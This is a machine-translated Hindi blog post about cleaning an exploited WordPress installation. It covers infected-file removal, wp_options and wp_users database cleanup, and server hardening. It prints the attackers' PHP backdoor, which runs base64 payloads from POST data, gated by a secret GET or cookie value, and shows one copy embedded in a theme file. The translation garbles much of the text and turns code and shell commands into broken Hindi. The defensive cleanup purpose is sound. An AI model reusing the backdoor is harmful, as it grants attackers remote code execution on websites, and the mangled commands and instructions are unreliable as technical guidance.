वर्डप्रेस शोषण - फाइलें वायरस और सुरक्षित एसक्यूएल सर्वर सफाई.

आप इस पोस्ट को पढ़ने से पहले, आपको यह देखना चाहिए , कुछ समझने के लिए. :)

हम साथ virusarii से उत्पन्न होने वाली है, नीचे करने के लिए इसी तरह के कोड stealthsettings.com फ़ाइलों पर ब्लॉगों के कई पाया WordPress के लिए फायदा उठाने.:

? <Php अगर ($ _ प्राप्त [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ पोस्ट [ 'फ़ाइल'])); बाहर निकलने के; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

XMLRPCउपरोक्त फाइल के बारे में है xmlrpc.php से सुस्त, एक में ग्रेप सर्वर, स्रोत कोड में इस तरह का एक बहुत की तरह लग रहा है.

pppffiuuu

संक्रमित फ़ाइलों की सफाई:

Ooookkkk ...
1. सबसे अच्छा समाधान है, यह किया जाता है के रूप में बैकअपऔर साफ डेटाबेस के लिए है पोंछ फ़ाइलें वर्डप्रेस (आप फ़ाइल wp-config.php रखने के लिए और सख्ती WP मंच से संबंधित नहीं ध्यान से जाँच के बाद कर सकते हैं) सर्वर पर और मूल अपलोड संस्करण बनाने 2.5.1 (इस अवसर पर और एक उन्नत संस्करण wp :) बनाने के लिए) http://wordpress.org/download/ . आप अपने सावधान जाँच पर भरोसा नहीं करते हैं तो विषय फाइलों सहित साफ कर लें.

यह प्रभावित हुए हैं लगता है और ब्लॉग पर पहले प्रयोग किया और बस को बदलने नहीं किया गया है कि विषयों की फाइलें, समस्या का समाधान नहीं है.

./andreea/wp-content/themes/default/index.php:<?php अगर ($ _ कुकी ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ पोस्ट [' फाइल '])); बाहर जाएं; ?}> <? Php get_header (); >?

2. खोज और जिसमें सभी फाइलों को नष्ट:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg और WP-info.txt फ़ाइल, यदि कोई हो.

खोजें. -नाम "* _new.php"
खोजें. -नाम "* _old.php"
खोजें. -नाम "*. Jpgg"
खोजें. -नाम "* _giff"
खोजें. -नाम "* _pngg"
खोजें. -नाम "WP-info.txt"

3. में / Tmp , खोज और की तरह फ़ोल्डर्स को नष्ट tmpYwbzT2

एसक्यूएल सफाई :

1. तालिका तालिका में wp_options के लिए जाँच करें और लाइनों को हटा दें: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Wp_options में सभी को जाना active_plugins एक्सटेंशन * _new.php, * _old.php, *. jpgg, *. Giff, *. pngg या एक और विस्तार संदेह है, तो ध्यान से जाँच में से एक में समाप्त होता है कि वहाँ एक प्लगइन है और अगर हटा दें.

3. तालिका में wp_usersअपने अधिकार में कुछ भी नहीं लिखा गया है जो एक उपयोगकर्ता, स्तंभ नहीं है, अगर देखें user_nicename। इस उपयोगकर्ता को हटाएँ, लेकिन आईडी स्तंभ पर नंबर नोट करें। उपयोगकर्ता के रूप में "वर्डप्रेस" का उपयोग कर सकते हैं user_login बनाया और 00 पर दिखाई देता है: 00: 00 0000-00-00.

4. टेबल पर जाएं wp_usermeta और ऊपर आईडी संबंधित सभी लाइनों को हटा दें.

आप इस एसक्यूएल सफाई के बाद किया है, को निष्क्रिय और फिर एक निश्चित प्लगइन को सक्रिय करें. (ब्लॉग में -> डैशबोर्ड -> प्लगइन्स)

सुरक्षित सर्वर:

1. "निर्देशिका और फाइल कर रहे हैं क्या देखेंलिखने योग्य"(Chmod 777) और उन्हें एक पर डाल करने की कोशिश परिवर्तन विद्या किसी भी स्तर पर उनके लेखन की अनुमति नहीं होगी. (Chmod 644, उदाहरण के लिए)

खोजें. -पेर्म-2-रास

2. फाइलें सा सेट है क्या देखें SUID या sgid . आप उपयोग नहीं करते हैं, तो उन फ़ाइलों को उन पर डाल chmod 0 या यह होता है कि पैकेज की स्थापना रद्द करें. वे विशेषाधिकार निष्पादित क्योंकि वे ", बहुत खतरनाक हैंसमूह"या फिर"जड़"सामान्य उपयोगकर्ता विशेषाधिकारों के साथ उस फ़ाइल को निष्पादित करने के लिए नहीं.

च पर्म-04000-रास / प्रकार खोजने
च पर्म-02000-रास / प्रकार खोजने

3. बंदरगाहों खुले हैं क्या जाँच करें और इस्तेमाल नहीं कर रहे हैं कि उन बंद करने या सुरक्षित करने के लिए प्रयास करें.

netstat-एक | grep-i सुनो

इतना. मैं देख रहा हूँ गूगल खोज और दूसरों "ठीक है तुम किया था !!!" कहते हैं। खैर अच्छी तरह से मैं इसे किया है ... लेकिन गूगल पर प्रतिबंध लगाने के लिए शुरू होता है अगर आप जानते हैं सभी साइटों गठन स्पैम है और (ट्रोजन डालTrojan.Clicker.HTML) कुकीज़ में?

वर्डप्रेस शोषण - फाइलें वायरस और सुरक्षित एसक्यूएल सर्वर सफाई.

लेखक के बारे में

छल

सब कुछ है कि गैजेट और आईटी 2006 की ख़ुशी से stealthsettings.com लिख सकते हैं और मैं कंप्यूटर और MacOS, लिनक्स, विंडोज, iOS और Android के बारे में आप के साथ नई चीजों की खोज करना चाहते के बारे में भावुक।

1 टिप्पणी

एक टिप्पणी छोड़ दो

यह साइट स्पैम को कम करने के लिए अकिस्मेट का उपयोग करती है। जानें कि आपका डेटा कैसे संसाधित किया जाता है.